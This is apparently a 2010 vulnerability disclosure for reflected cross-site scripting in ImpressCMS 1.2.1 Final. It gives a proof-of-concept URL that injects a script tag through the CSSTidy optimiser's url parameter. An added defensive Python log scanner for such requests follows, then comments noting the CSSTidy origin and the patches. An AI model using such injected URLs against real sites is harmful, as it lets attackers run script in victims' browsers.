This site is soon to be deprecated by http://www.johnleitch.net

Sunday, July 11, 2010

ImpressCMS 1.2.1 Final Reflected Cross-site Scripting

A reflected cross-site scripting vulnerability in ImpressCMS 1.2.1 Final can be exploited to execute arbitrary JavaScript in the browser of a user who follows a crafted link.

PoC
http://localhost/impresscms/plugins/csstidy/css_optimiser.php?url=%22%3E%3Cscript%3Ealert(0)%3C/script%3E
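
For defenders checking web server logs for requests like the PoC above, this added example (not part of the original post, ImpressCMS or CSSTidy) flags requests to css_optimiser.php whose url parameter decodes to markup characters. The combined log format, the sample log lines and all function names are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Script path and parameter name come from the PoC URL on this page.
TARGET_SUFFIX = "/plugins/csstidy/css_optimiser.php"
PARAM = "url"
# Characters that close a double-quoted attribute or open a tag, as the PoC does.
MARKUP = re.compile(r'["<>]')
# Request field of an access log line (combined log format is an assumption).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log; addresses are from the documentation range.
SAMPLE_LOG = [
    '192.0.2.10 - - [11/Jul/2010:10:00:01 +0000] "GET /impresscms/plugins/csstidy/'
    'css_optimiser.php?url=http%3A%2F%2Fexample.org%2Fstyle.css HTTP/1.1" 200 5120',
    '192.0.2.44 - - [11/Jul/2010:10:02:13 +0000] "GET /impresscms/plugins/csstidy/'
    'css_optimiser.php?url=%22%3E%3Cscript%3Ealert(0)%3C/script%3E HTTP/1.1" 200 5242',
    '192.0.2.44 - - [11/Jul/2010:10:02:40 +0000] "GET /impresscms/plugins/csstidy/'
    'css_optimiser.php?url=%2522%253E%253Cb%253E HTTP/1.1" 200 5201',
    '192.0.2.7 - - [11/Jul/2010:10:05:00 +0000] "GET /impresscms/index.php?url=%3Cb%3E'
    ' HTTP/1.1" 200 900',
]


def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded values are also inspected."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_requests(log_lines):
    """Return (line_number, decoded_value) for target requests carrying markup."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST.search(line)
        if not match:
            continue
        target = urlsplit(match.group(1))
        if not target.path.lower().endswith(TARGET_SUFFIX):
            continue
        for value in parse_qs(target.query, keep_blank_values=True).get(PARAM, []):
            value = fully_decode(value)
            if MARKUP.search(value):
                hits.append((number, value))
    return hits
```

A hit shows only that a request carried markup in the parameter; whether the response reflected it depends on the installed CSSTidy version.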

4 comments:

  1. Please be aware, this is not an issue with ImpressCMS; it is an issue with CSSTidy, which is used by many projects.

  2. A workaround has been published by the ImpressCMS project: http://community.impresscms.org/modules/smartsection/item.php?itemid=494

    A security release will be upcoming.

  3. An updated release removing the vulnerability in CSSTidy has been published by ImpressCMS - http://community.impresscms.org/modules/smartsection/item.php?itemid=495
